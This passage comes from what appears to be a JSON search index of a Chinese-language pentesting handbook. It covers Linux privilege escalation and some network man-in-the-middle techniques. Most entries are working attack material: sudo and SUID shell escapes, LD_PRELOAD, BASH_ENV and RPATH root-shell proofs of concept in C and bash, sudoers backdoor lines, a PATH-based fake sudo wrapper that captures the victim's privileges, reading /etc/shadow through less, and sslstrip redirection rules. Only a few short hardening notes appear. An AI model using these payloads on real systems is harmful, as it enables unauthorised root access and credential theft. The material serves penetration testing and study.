/containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1\\nHost:\\nConnection: Upgrade\\nUpgrade: tcp 在建立 socat 连接后,你可以直接在容器内执行命令,并以 root 级别访问宿主机的文件系统。","breadcrumbs":"Linux Privilege Escalation » 可写的 Docker Socket","id":"1413","title":"可写的 Docker Socket"},"1414":{"body":"注意,如果你对 docker socket 有写权限,因为你位于组 docker 内,你将有 更多提权方式 。如果 docker API 在端口监听 ,你也可能能够攻破它 。 在以下位置查看 更多从 docker 逃逸或滥用以提权的方法 : Docker Security","breadcrumbs":"Linux Privilege Escalation » Others","id":"1414","title":"Others"},"1415":{"body":"如果你发现可以使用 ctr 命令,请阅读以下页面, 因为你可能能够滥用它来提权 : Containerd (ctr) Privilege Escalation","breadcrumbs":"Linux Privilege Escalation » Containerd (ctr) 提权","id":"1415","title":"Containerd (ctr) 提权"},"1416":{"body":"如果你发现可以使用 runc 命令,请阅读以下页面, 因为你可能能够滥用它来提权 : RunC Privilege Escalation","breadcrumbs":"Linux Privilege Escalation » RunC 提权","id":"1416","title":"RunC 提权"},"1417":{"body":"D-Bus 是一个复杂的进程间通信 (IPC) 系统,允许应用程序高效地交互和共享数据。它为现代 Linux 系统设计,提供了一个用于不同形式应用间通信的稳健框架。 
该系统功能多样,支持增强进程间数据交换的基本 IPC,类似于增强版的 UNIX 域套接字。此外,它有助于广播事件或信号,促进系统组件之间的无缝集成。例如,Bluetooth 守护进程关于来电的信号可以促使音乐播放器静音,以改善用户体验。另一个方面,D-Bus 支持远程对象系统,简化了应用程序之间的服务请求和方法调用,优化了传统上较为复杂的流程。 D-Bus 基于允许/拒绝模型运行,基于匹配策略规则的累积效果来管理消息权限(方法调用、信号发射等)。这些策略指定了与总线的交互,可能通过滥用这些权限导致提权。 在 /etc/dbus-1/system.d/wpa_supplicant.conf 中提供了这样的策略示例,详细说明了 root 用户拥有、发送给和接收来自 fi.w1.wpa_supplicant1 的消息的权限。 未指定用户或组的策略普遍适用,而“default”上下文策略适用于所有未被其他特定策略覆盖的情况。 xml \\n\\n\\n\\n\\n 在这里学习如何对 D-Bus 通信进行 enumerate 和 exploit: D-Bus Enumeration & Command Injection Privilege Escalation","breadcrumbs":"Linux Privilege Escalation » D-Bus","id":"1417","title":"D-Bus"},"1418":{"body":"通常值得对网络进行 enumerate 并弄清主机的位置。","breadcrumbs":"Linux Privilege Escalation » 网络","id":"1418","title":"网络"},"1419":{"body":"bash #Hostname, hosts and DNS\\ncat /etc/hostname /etc/hosts /etc/resolv.conf\\ndnsdomainname #Content of /etc/inetd.conf & /etc/xinetd.conf\\ncat /etc/inetd.conf /etc/xinetd.conf #Interfaces\\ncat /etc/networks\\n(ifconfig || ip a) #Neighbours\\n(arp -e || arp -a)\\n(route || ip n) #Iptables rules\\n(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v \\"^#\\" | grep -Pv \\"\\\\W*\\\\#\\" 2>/dev/null) #Files used by network services\\nlsof -i","breadcrumbs":"Linux Privilege Escalation » 通用 enumeration","id":"1419","title":"通用 enumeration"},"142":{"body":"","breadcrumbs":"Pentesting Network » HTTP (fake page and JS code injection)","id":"142","title":"HTTP (fake page and JS code injection)"},"1420":{"body":"在访问机器之前,始终检查在该机器上运行但你之前无法与之交互的网络服务: bash (netstat -punta || ss --ntpu)\\n(netstat -punta || ss --ntpu) | grep \\"127.0\\"","breadcrumbs":"Linux Privilege Escalation » 开放端口","id":"1420","title":"开放端口"},"1421":{"body":"检查是否能 sniff traffic。 如果可以,你可能能够获取一些 credentials。 timeout 1 tcpdump","breadcrumbs":"Linux Privilege Escalation » Sniffing","id":"1421","title":"Sniffing"},"1422":{"body":"","breadcrumbs":"Linux Privilege Escalation » 用户","id":"1422","title":"用户"},"1423":{"body":"检查你是 who ,你拥有哪些 privileges ,系统中有哪些 
users ,哪些可以 login ,以及哪些拥有 root privileges : bash #Info about me\\nid || (whoami && groups) 2>/dev/null\\n#List all users\\ncat /etc/passwd | cut -d: -f1\\n#List users with console\\ncat /etc/passwd | grep \\"sh$\\"\\n#List superusers\\nawk -F: \'($3 == \\"0\\") {print}\' /etc/passwd\\n#Currently logged users\\nw\\n#Login history\\nlast | tail\\n#Last log of each user\\nlastlog #List all users and their groups\\nfor i in $(cut -d\\":\\" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort\\n#Current user PGP keys\\ngpg --list-keys 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 通用枚举","id":"1423","title":"通用枚举"},"1424":{"body":"某些 Linux 版本受到一个漏洞影响,允许具有 UID > INT_MAX 的用户提权。More info: here , here and here . 利用它 使用: systemd-run -t /bin/bash","breadcrumbs":"Linux Privilege Escalation » Big UID","id":"1424","title":"Big UID"},"1425":{"body":"检查你是否是可能授予你 root 权限的 某个组的成员 : Interesting Groups - Linux Privesc","breadcrumbs":"Linux Privilege Escalation » Groups","id":"1425","title":"Groups"},"1426":{"body":"检查剪贴板中是否有任何有趣的内容(如果可能) bash if [ `which xclip 2>/dev/null` ]; then\\necho \\"Clipboard: \\"`xclip -o -selection clipboard 2>/dev/null`\\necho \\"Highlighted text: \\"`xclip -o 2>/dev/null`\\nelif [ `which xsel 2>/dev/null` ]; then\\necho \\"Clipboard: \\"`xsel -ob 2>/dev/null`\\necho \\"Highlighted text: \\"`xsel -o 2>/dev/null`\\nelse echo \\"Not found xsel and xclip\\"\\nfi","breadcrumbs":"Linux Privilege Escalation » Clipboard","id":"1426","title":"Clipboard"},"1427":{"body":"bash grep \\"^PASS_MAX_DAYS\\\\|^PASS_MIN_DAYS\\\\|^PASS_WARN_AGE\\\\|^ENCRYPT_METHOD\\" /etc/login.defs","breadcrumbs":"Linux Privilege Escalation » 密码策略","id":"1427","title":"密码策略"},"1428":{"body":"如果你 知道环境中任何密码 ,请 尝试使用该密码登录每个用户 。","breadcrumbs":"Linux Privilege Escalation » 已知密码","id":"1428","title":"已知密码"},"1429":{"body":"如果你不介意产生大量噪音并且系统上存在 su 和 timeout 二进制文件,你可以尝试使用 su-bruteforce 。 Linpeas 使用 -a 参数也会尝试对用户进行暴力破解。","breadcrumbs":"Linux Privilege Escalation » Su 
Brute","id":"1429","title":"Su Brute"},"143":{"body":"","breadcrumbs":"Pentesting Network » 互联网攻击","id":"143","title":"互联网攻击"},"1430":{"body":"","breadcrumbs":"Linux Privilege Escalation » 可写的 $PATH 滥用","id":"1430","title":"可写的 $PATH 滥用"},"1431":{"body":"如果你发现你可以 在 $PATH 的某个文件夹中写入 ,你可能能够通过 在可写文件夹中创建 backdoor ,并将其命名为某个将由其他用户(理想情况下为 root)执行的命令,从而提升权限,前提是该命令 不会从位于你的可写文件夹之前的文件夹加载 。","breadcrumbs":"Linux Privilege Escalation » $PATH","id":"1431","title":"$PATH"},"1432":{"body":"你可能被允许使用 sudo 执行某些命令,或者某些命令可能设置了 suid 位。使用以下命令检查: bash sudo -l #Check commands you can execute with sudo\\nfind / -perm -4000 2>/dev/null #Find all SUID binaries 一些 意想不到的 commands 允许你读取和/或写入 files 或甚至执行命令。 例如: bash sudo awk \'BEGIN {system(\\"/bin/sh\\")}\'\\nsudo find /etc -exec sh -i \\\\;\\nsudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh\\nsudo tar c a.tar -I ./runme.sh a\\nftp>!/bin/sh\\nless>! ","breadcrumbs":"Linux Privilege Escalation » SUDO and SUID","id":"1432","title":"SUDO and SUID"},"1433":{"body":"Sudo 配置可能允许用户在不知晓密码的情况下,以另一个用户的权限执行某些命令。 $ sudo -l\\nUser demo may run the following commands on crashlab:\\n(root) NOPASSWD: /usr/bin/vim 在这个例子中,用户 demo 可以以 root 身份运行 vim,现在通过将 ssh key 添加到 root 目录或调用 sh 来获得 shell 非常简单。 sudo vim -c \'!sh\'","breadcrumbs":"Linux Privilege Escalation » NOPASSWD","id":"1433","title":"NOPASSWD"},"1434":{"body":"此指令允许用户在执行某些操作时 设置环境变量 : bash $ sudo -l\\nUser waldo may run the following commands on admirer:\\n(ALL) SETENV: /opt/scripts/admin_tasks.sh 这个示例, 基于 HTB machine Admirer , 存在漏洞 ,可通过 PYTHONPATH hijacking 在以 root 身份执行脚本时加载任意 python library: bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh","breadcrumbs":"Linux Privilege Escalation » SETENV","id":"1434","title":"SETENV"},"1435":{"body":"如果 sudoers 保留了 BASH_ENV(例如 Defaults env_keep+=\\"ENV BASH_ENV\\"),你可以利用 Bash 的非交互式启动行为,在调用被允许的命令时以 root 身份运行任意代码。 Why it works: 对于非交互式 shell,Bash 会在运行目标脚本之前评估 $BASH_ENV 并加载执行该文件。许多 sudo 规则允许运行脚本或 shell 包装器。如果 sudo 保留了 BASH_ENV,你的文件就会以 root 权限被执行。 Requirements: 
一个你可以运行的 sudo 规则(任何以非交互方式调用 /bin/bash 的目标,或任何 bash 脚本)。 BASH_ENV 出现在 env_keep 中(可用 sudo -l 检查)。 PoC: bash cat > /dev/shm/shell.sh <<\'EOF\'\\n#!/bin/bash\\n/bin/bash\\nEOF\\nchmod +x /dev/shm/shell.sh\\nBASH_ENV=/dev/shm/shell.sh sudo /usr/bin/systeminfo # or any permitted script/binary that triggers bash\\n# You should now have a root shell 加固: 从 env_keep 中移除 BASH_ENV(和 ENV),优先使用 env_reset。 避免为允许 sudo 的命令使用 shell 包装器;尽量使用最小化的二进制文件。 当保留的环境变量被使用时,考虑对 sudo 的 I/O 进行日志记录与告警。","breadcrumbs":"Linux Privilege Escalation » BASH_ENV preserved via sudo env_keep → root shell","id":"1435","title":"BASH_ENV preserved via sudo env_keep → root shell"},"1436":{"body":"Jump 跳转以阅读其他文件或使用 symlinks 。例如在 sudoers 文件中: hacker10 ALL= (root) /bin/less /var/log/* bash sudo less /var/logs/anything\\nless>:e /etc/shadow #Jump to read other files using privileged less bash ln /etc/shadow /var/log/new\\nsudo less /var/log/new #Use symlinks to read any file 如果使用 wildcard (*),就更容易: bash sudo less /var/log/../../etc/shadow #Read shadow\\nsudo less /var/log/something /etc/shadow #Red 2 files 缓解措施 : https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/","breadcrumbs":"Linux Privilege Escalation » Sudo 执行绕过路径","id":"1436","title":"Sudo 执行绕过路径"},"1437":{"body":"如果将 sudo 权限 授予单个命令且 未指定路径 : hacker10 ALL= (root) less ,你可以通过更改 PATH 变量来利用它 bash export PATH=/tmp:$PATH\\n#Put your backdoor in /tmp and name it \\"less\\"\\nsudo less 此技术也可用于当一个 suid binary 在不指定路径的情况下执行另一个命令(始终使用 strings 检查可疑的 SUID binary 的内容) 。 Payload examples to execute.","breadcrumbs":"Linux Privilege Escalation » Sudo command/SUID binary 未指定命令路径","id":"1437","title":"Sudo command/SUID binary 未指定命令路径"},"1438":{"body":"如果 suid binary 执行另一个指定了路径的命令 ,则可以尝试 导出一个函数 ,其名称与 suid 文件所调用的命令相同。 例如,如果一个 suid binary 调用 /usr/sbin/service apache2 start ,你需要尝试创建该函数并导出: bash function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }\\nexport -f /usr/sbin/service Then, when you call the suid 
binary, this function will be executed","breadcrumbs":"Linux Privilege Escalation » SUID binary 带命令路径","id":"1438","title":"SUID binary 带命令路径"},"1439":{"body":"环境变量 LD_PRELOAD 用来指定一个或多个共享库(.so 文件),由加载器在其他库之前载入,包括标准 C 库(libc.so)。这个过程称为预加载库。 但是,为了维护系统安全并防止此功能被滥用,尤其是在 suid/sgid 可执行文件上,系统施加了某些限制: 对于 real user ID ( ruid ) 与 effective user ID ( euid ) 不匹配的可执行文件,加载器会忽略 LD_PRELOAD 。 对于带有 suid/sgid 的可执行文件,只有位于标准路径且自身也是 suid/sgid 的库会被预加载。 如果你能够使用 sudo 执行命令,且 sudo -l 的输出包含 env_keep+=LD_PRELOAD ,则可能发生特权提升。这个配置允许 LD_PRELOAD 环境变量在使用 sudo 运行命令时仍然保留并被识别,从而可能导致以提升的权限执行任意代码。 Defaults env_keep += LD_PRELOAD 保存为 /tmp/pe.c c #include \\n#include \\n#include void _init() {\\nunsetenv(\\"LD_PRELOAD\\");\\nsetgid(0);\\nsetuid(0);\\nsystem(\\"/bin/bash\\");\\n} 然后使用以下命令来 编译它 : bash cd /tmp\\ngcc -fPIC -shared -o pe.so pe.c -nostartfiles 最后,运行 escalate privileges bash sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo caution 如果攻击者能控制 LD_LIBRARY_PATH 环境变量,则可以滥用类似的 privesc,因为攻击者控制了库将被搜索的路径。 c #include \\n#include static void hijack() __attribute__((constructor)); void hijack() {\\nunsetenv(\\"LD_LIBRARY_PATH\\");\\nsetresuid(0,0,0);\\nsystem(\\"/bin/bash -p\\");\\n} bash # Compile & execute\\ncd /tmp\\ngcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c\\nsudo LD_LIBRARY_PATH=/tmp ","breadcrumbs":"Linux Privilege Escalation » LD_PRELOAD & LD_LIBRARY_PATH","id":"1439","title":"LD_PRELOAD & LD_LIBRARY_PATH"},"144":{"body":"基本上,这个攻击的作用是,如果 user 试图 access 一个 HTTP 页面并被 redirecting 到 HTTPS 版本, sslStrip 会 maintain 一个 HTTP connection with 该 client and 一个 HTTPS connection with 该 server ,因此它将能够 sniff 该连接的 plain text 。 bash apt-get install sslstrip\\nsslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k\\n#iptables --flush\\n#iptables --flush -t nat\\niptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000\\niptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT 更多信息 here .","breadcrumbs":"Pentesting Network » 
sslStrip","id":"144","title":"sslStrip"},"1440":{"body":"当遇到具有 SUID 权限且看起来不寻常的二进制文件时,最好确认它是否正确加载 .so 文件。可以通过运行以下命令来检查: bash strace 2>&1 | grep -i -E \\"open|access|no such file\\" 例如,遇到类似错误 \\"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)\\" 表明可能存在 exploitation 的可能性。 要 exploit 这个,可通过创建一个 C 文件,例如 \\"/path/to/.config/libcalc.c\\" , 并包含以下代码: c #include \\n#include static void inject() __attribute__((constructor)); void inject(){\\nsystem(\\"cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p\\");\\n} 这段代码在编译并执行后,旨在通过修改文件权限并执行具有提升权限的 shell 来提升权限。 使用以下命令将上面的 C 文件编译为 shared object (.so) 文件: bash gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c 最后,运行受影响的 SUID 二进制文件应触发该 exploit,从而可能导致系统遭到妥协。","breadcrumbs":"Linux Privilege Escalation » SUID Binary – .so injection","id":"1440","title":"SUID Binary – .so injection"},"1441":{"body":"bash # Lets find a SUID using a non-standard library\\nldd some_suid\\nsomething.so => /lib/x86_64-linux-gnu/something.so # The SUID also loads libraries from a custom location where we can write\\nreadelf -d payroll | grep PATH\\n0x000000000000001d (RUNPATH) Library runpath: [/development] 既然我们已经找到一个会从我们可写的文件夹加载 library 的 SUID binary,就在该文件夹中以所需的名称创建该 library: c //gcc src.c -fPIC -shared -o /development/libshared.so\\n#include \\n#include static void hijack() __attribute__((constructor)); void hijack() {\\nsetresuid(0,0,0);\\nsystem(\\"/bin/bash -p\\");\\n} 如果你遇到类似如下的错误: shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name 这意味着你生成的库需要包含一个名为 a_function_name 的函数。","breadcrumbs":"Linux Privilege Escalation » Shared Object Hijacking","id":"1441","title":"Shared Object Hijacking"},"1442":{"body":"GTFOBins 是一个精选的 Unix 二进制可执行文件列表,这些文件可能被攻击者利用以绕过本地安全限制。 GTFOArgs 针对只能在命令中 注入参数 的情况提供了类似的列表。 该项目收集了 Unix 二进制程序的合法功能,这些功能可能被滥用来逃离受限 shell、提升或保持提升的权限、传输文件、生成 bind 和 reverse shell,以及辅助其它 post-exploitation 任务。 gdb -nx -ex \'!sh\' -ex quit sudo mysql -e 
\'! /bin/sh\' strace -o /dev/null /bin/sh sudo awk \'BEGIN {system(\\"/bin/sh\\")}\' \\\\n \\\\n GTFOBins\\\\n \\\\n \\\\n GTFOArgs\\\\n","breadcrumbs":"Linux Privilege Escalation » GTFOBins","id":"1442","title":"GTFOBins"},"1443":{"body":"如果你可以访问 sudo -l,可以使用工具 FallOfSudo 来检查它是否能找到利用任何 sudo 规则的方法。","breadcrumbs":"Linux Privilege Escalation » FallOfSudo","id":"1443","title":"FallOfSudo"},"1444":{"body":"在拥有 sudo access 但没有密码的情况下,你可以通过 等待某次 sudo 命令执行然后劫持会话令牌 来提升权限。 Requirements to escalate privileges: 你已经有一个以用户 sampleuser 身份的 shell sampleuser 已 使用 sudo 在 最近 15 分钟 内执行过某些命令(默认这是 sudo 令牌允许我们在不输入密码的情况下使用 sudo 的持续时间) cat /proc/sys/kernel/yama/ptrace_scope 的输出为 0 gdb 可用(你可以上传它) (你可以临时使用 echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope 来启用 ptrace_scope,或通过永久修改 /etc/sysctl.d/10-ptrace.conf 并设置 kernel.yama.ptrace_scope = 0 来实现) If all these requirements are met, you can escalate privileges using: https://github.com/nongiach/sudo_inject 第一个 exploit (exploit.sh) 会在 /tmp 创建名为 activate_sudo_token 的二进制文件。你可以用它来 在你的会话中激活 sudo 令牌 (它不会自动给你 root shell,需执行 sudo su): bash bash exploit.sh\\n/tmp/activate_sudo_token\\nsudo su 第二个 exploit (exploit_v2.sh) 会在 /tmp 创建一个 sh shell, 归 root 所有并带有 setuid bash bash exploit_v2.sh\\n/tmp/sh -p 第三个 exploit (exploit_v3.sh) 会 create a sudoers file ,使 sudo tokens eternal and allows all users to use sudo bash bash exploit_v3.sh\\nsudo su","breadcrumbs":"Linux Privilege Escalation » Reusing Sudo Tokens","id":"1444","title":"Reusing Sudo Tokens"},"1445":{"body":"如果你对该文件夹或其下创建的任意文件具有 写权限 ,你可以使用二进制工具 write_sudo_token 来 为某个用户和 PID 创建 sudo token 。 例如,如果你能覆盖文件 /var/run/sudo/ts/sampleuser ,并且以该用户身份拥有 PID 为 1234 的 shell,你可以在不需要知道密码的情况下通过以下方式 获得 sudo privileges : bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser","breadcrumbs":"Linux Privilege Escalation » /var/run/sudo/ts/","id":"1445","title":"/var/run/sudo/ts/"},"1446":{"body":"文件 /etc/sudoers 及 /etc/sudoers.d 内的文件用来配置谁可以使用 sudo 以及如何使用。 这些文件 默认情况下只能由用户 root 和组 root 读取 。 如果 你 可以读取 该文件,可能能够 获取一些有趣的信息 
,而如果你 可以写入 任何文件,你将能够 提升权限 。 bash ls -l /etc/sudoers /etc/sudoers.d/\\nls -ld /etc/sudoers.d/ 如果你可以写入,你就可以滥用此权限 bash echo \\"$(whoami) ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers\\necho \\"$(whoami) ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers.d/README 注意:sudo 在解析前会校验 sudoers 文件的属主和权限(必须属于 root,且不能被 group/other 写入),不满足条件的 /etc/sudoers 或 sudoers.d 中的文件会被 sudo 报错拒绝。因此仅因为文件本身 world-writable 而得到的写权限通常无法直接利用;而借助 capabilities(如 CAP_DAC_OVERRIDE)或以 root 运行的进程中的任意文件写入来修改文件则可以。另外,sudoers.d 中文件名含有 . 或以 ~ 结尾的文件会被忽略(README 这个名字是合法的)。 滥用这些权限的另一种方式: bash # makes it so every terminal can sudo\\necho \\"Defaults !tty_tickets\\" > /etc/sudoers.d/win\\n# makes it so sudo never times out\\necho \\"Defaults timestamp_timeout=-1\\" >> /etc/sudoers.d/win","breadcrumbs":"Linux Privilege Escalation » /etc/sudoers, /etc/sudoers.d","id":"1446","title":"/etc/sudoers, /etc/sudoers.d"},"1447":{"body":"有一些替代 sudo 的选项,例如 OpenBSD 的 doas,请记得检查其配置 /etc/doas.conf。 permit nopass demo as root cmd vim (这条规则允许用户 demo 无需口令就以 root 运行 vim;vim 这类能执行外部命令的程序意味着可以直接得到 root shell,例如在 vim 中执行 :!/bin/sh)","breadcrumbs":"Linux Privilege Escalation » DOAS","id":"1447","title":"DOAS"},"1448":{"body":"如果你知道某个 用户通常连接到一台机器并使用 sudo 来提升权限,且你已在该用户上下文中获得了一个 shell,你可以 创建一个新的 sudo 可执行文件 ,该文件会先以 root 身份执行你的代码,然后再执行用户的命令。然后, 修改该用户上下文的 $PATH (例如在 .bash_profile 中添加新路径),这样当用户执行 sudo 时,就会运行你创建的 sudo 可执行文件。 请注意,如果用户使用不同的 shell(不是 bash),你需要修改其他文件来添加新路径。例如 sudo-piggyback 会修改 ~/.bashrc, ~/.zshrc, ~/.bash_profile。你可以在 bashdoor.py 中找到另一个示例。 或者运行类似如下的命令(第一次调用真正的 sudo 时用户会像往常一样输入口令,随后的调用则复用已缓存的 sudo 令牌): bash cat >/tmp/sudo <<EOF\\n#!/bin/bash\\n/usr/bin/sudo /path/to/payload > /tmp/privesc\\n/usr/bin/sudo \\"\\\\$@\\"\\nEOF\\nchmod +x /tmp/sudo\\necho \'export PATH=/tmp:$PATH\' >> $HOME/.zshenv # or \\".bashrc\\" or any other # From the victim\\nzsh\\necho $PATH\\nsudo ls","breadcrumbs":"Linux Privilege Escalation » Sudo Hijacking","id":"1448","title":"Sudo Hijacking"},"1449":{"body":"","breadcrumbs":"Linux Privilege Escalation » 共享库","id":"1449","title":"共享库"},"145":{"body":"与 sslStrip 相比, sslStrip+ and dns2proxy 的 区别 在于它们会 重定向 例如 www.facebook.com 到 wwww.facebook.com (注意 额外 的“ w ”)并将 该域名的地址设为攻击者 IP 。这样, 客户端 会 连接 到 wwww.facebook.com (攻击者),但在幕后,**sslstrip+**会通过 https 与 www.facebook.com 维护 真实的连接。 该技术的 目标 是 绕过 HSTS ,因为 wwww .facebook.com 不会 被保存在浏览器的 缓存 中,因此浏览器会被欺骗以通过 HTTP 执行 facebook 身份验证 。 注意,为执行此攻击,受害者必须最初尝试访问 http://www.facebook.com 而不是 https。这可以通过修改 http 页面内的链接来完成。 更多信息 here , here 和 here . 
sslStrip or sslStrip+ 不再可行。原因是浏览器中预存了 HSTS 规则,所以即使用户第一次访问一个“重要”域,他也会通过 HTTPS 访问。此外,请注意预存规则和其他生成的规则可以使用标志 includeSubdomains 因此之前的 wwww.facebook.com 示例将不再有效,因为 facebook.com 使用带有 includeSubdomains 的 HSTS。 TODO: easy-creds, evilgrade, metasploit, factory","breadcrumbs":"Pentesting Network » sslStrip+ and dns2proxy 用于绕过 HSTS","id":"145","title":"sslStrip+ and dns2proxy 用于绕过 HSTS"},"1450":{"body":"The file /etc/ld.so.conf indicates where the loaded configurations files are from . Typically, this file contains the following path: include /etc/ld.so.conf.d/*.conf That means that the configuration files from /etc/ld.so.conf.d/*.conf will be read. This configuration files points to other folders where libraries are going to be searched for. For example, the content of /etc/ld.so.conf.d/libc.conf is /usr/local/lib. This means that the system will search for libraries inside /usr/local/lib . If for some reason a user has write permissions on any of the paths indicated: /etc/ld.so.conf, /etc/ld.so.conf.d/, any file inside /etc/ld.so.conf.d/ or any folder within the config file inside /etc/ld.so.conf.d/*.conf he may be able to escalate privileges. 
Take a look at how to exploit this misconfiguration in the following page: ld.so privesc exploit example","breadcrumbs":"Linux Privilege Escalation » ld.so","id":"1450","title":"ld.so"},"1451":{"body":"level15@nebula:/home/flag15$ readelf -d flag15 | egrep \\"NEEDED|RPATH\\"\\n0x00000001 (NEEDED) Shared library: [libc.so.6]\\n0x0000000f (RPATH) Library rpath: [/var/tmp/flag15] level15@nebula:/home/flag15$ ldd ./flag15\\nlinux-gate.so.1 => (0x0068c000)\\nlibc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)\\n/lib/ld-linux.so.2 (0x005bb000) 通过将 lib 复制到 /var/tmp/flag15/,程序会在此处按照 RPATH 变量的指定使用它。 level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ level15@nebula:/home/flag15$ ldd ./flag15\\nlinux-gate.so.1 => (0x005b0000)\\nlibc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)\\n/lib/ld-linux.so.2 (0x00737000) 然后在 /var/tmp/flag15(即 RPATH 指向的目录)创建一个恶意的 libc.so.6。与 LD_LIBRARY_PATH 不同,动态链接器对 setuid 二进制同样会遵循 DT_RPATH/DT_RUNPATH,这正是该技巧能提权的原因。下面编译命令中的 -Wl,--version-script=version 需要一个自行提供的 version 脚本,用来导出目标二进制所要求的 glibc 符号版本: gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6 c #include <stdlib.h>\\n#define SHELL \\"/bin/sh\\" int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))\\n{\\nchar *file = SHELL;\\nchar *argv[] = {SHELL,0};\\nsetresuid(geteuid(),geteuid(), geteuid());\\nexecve(file,argv,0);\\n}","breadcrumbs":"Linux Privilege Escalation » RPATH","id":"1451","title":"RPATH"},"1452":{"body":"Linux capabilities 为进程提供了 root 特权的一个可用子集 。这有效地将 root 的 特权分解为更小且更独立的单元 。这些单元中的每一个都可以独立授予给进程。这样就减少了完整权限集,从而降低了被利用的风险。 阅读以下页面以 了解有关 capabilities 以及如何滥用它们的更多信息 : Linux Capabilities","breadcrumbs":"Linux Privilege Escalation » 能力","id":"1452","title":"能力"},"1453":{"body":"在目录中, \\"execute\\" 位 表示受影响的用户可以 \\"cd\\" 进入该文件夹。 \\"read\\" 位 表示用户可以 列出 这些 文件 ,而 \\"write\\" 位 表示用户可以 删除 和 创建 新的 文件 。","breadcrumbs":"Linux Privilege Escalation » 目录权限","id":"1453","title":"目录权限"},"1454":{"body":"访问控制列表 (ACLs) 表示可自由裁量权限的二级层,能够 覆盖传统的 ugo/rwx 权限 。这些权限通过允许或拒绝非所有者或不在组内的特定用户的访问权来增强对文件或目录访问的控制。此级别的 粒度确保更精确的访问管理 
。更多细节请见 here 。 授予 用户 \\"kali\\" 对某个文件的 read 和 write 权限: bash setfacl -m u:kali:rw file.txt\\n#Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included) setfacl -b file.txt #Remove the ACL of the file 获取 从系统中带有特定 ACLs 的文件: bash getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » ACLs","id":"1454","title":"ACLs"},"1455":{"body":"在 旧版本 中你可能可以 hijack 某个不同用户( root )的 shell 会话。 在 最新版本 中你只能 连接 到仅属于 你自己的用户 的 screen sessions。不过,你可能会在会话内部发现 会话内部的有趣信息 。","breadcrumbs":"Linux Privilege Escalation » 打开 shell 会话","id":"1455","title":"打开 shell 会话"},"1456":{"body":"列出 screen sessions bash screen -ls\\nscreen -ls / # Show another user\' screen sessions 附加到会话 bash screen -dr #The -d is to detach whoever is attached to it\\nscreen -dr 3350.foo #In the example of the image\\nscreen -x [user]/[session id] 注意:只有当目标会话开启了 multiuser on、通过 acladd 授权了你的用户,并且 screen 以 setuid root 安装时,才能附加到其他用户的会话;否则 screen 会拒绝访问。","breadcrumbs":"Linux Privilege Escalation » screen sessions hijacking","id":"1456","title":"screen sessions hijacking"},"1457":{"body":"这是一个出现在 old tmux versions 的问题。作为非特权用户,我无法劫持由 root 创建的 tmux (v2.1) 会话。 列出 tmux 会话 bash tmux ls\\nps aux | grep tmux #Search for tmux consoles not using default folder for sockets\\ntmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess 连接到 session bash tmux attach -t myname #If you write something in this session it will appears in the other opened one\\ntmux attach -d -t myname #First detach the session from the other console and then access it yourself ls -la /tmp/dev_sess #Check who can access it\\nrw-rw---- 1 root devs 0 Sep 1 06:27 /tmp/dev_sess #In this case root and devs can\\n# If you are root or devs you can access it\\ntmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket Check Valentine box from HTB for an example.","breadcrumbs":"Linux Privilege Escalation » tmux sessions hijacking","id":"1457","title":"tmux sessions hijacking"},"1458":{"body":"","breadcrumbs":"Linux 
Privilege Escalation » SSH","id":"1458","title":"SSH"},"1459":{"body":"在 2006 年 9 月至 2008 年 5 月 13 日之间,在基于 Debian 的系统(Ubuntu、Kubuntu 等)上生成的所有 SSL 和 SSH 密钥可能受到此漏洞影响。 该漏洞在这些操作系统上创建新的 ssh 密钥时产生,由于随机数只依赖进程 PID, 对每种密钥类型和长度只有 32,768 种变体可用 。这意味着所有可能性都可以被计算出来, 得到 ssh 公钥后即可搜索对应的私钥 。你可以在这里找到计算出的可能性: https://github.com/g0tmi1k/debian-ssh","breadcrumbs":"Linux Privilege Escalation » Debian OpenSSL Predictable PRNG - CVE-2008-0166","id":"1459","title":"Debian OpenSSL Predictable PRNG - CVE-2008-0166"},"146":{"body":"bash sudo nc -l -p 80\\nsocat TCP4-LISTEN:80,fork,reuseaddr -","breadcrumbs":"Pentesting Network » TCP 监听端口","id":"146","title":"TCP 监听端口"},"1460":{"body":"PasswordAuthentication: 指定是否允许密码认证。sshd 的内置默认值是 yes(很多发行版或云镜像会在配置中改为 no)。 PubkeyAuthentication: 指定是否允许公钥认证。默认是 yes。 PermitEmptyPasswords : 当允许密码认证时,指定服务器是否允许使用空密码字符串登录账户。默认是 no。","breadcrumbs":"Linux Privilege Escalation » SSH Interesting configuration values","id":"1460","title":"SSH Interesting configuration 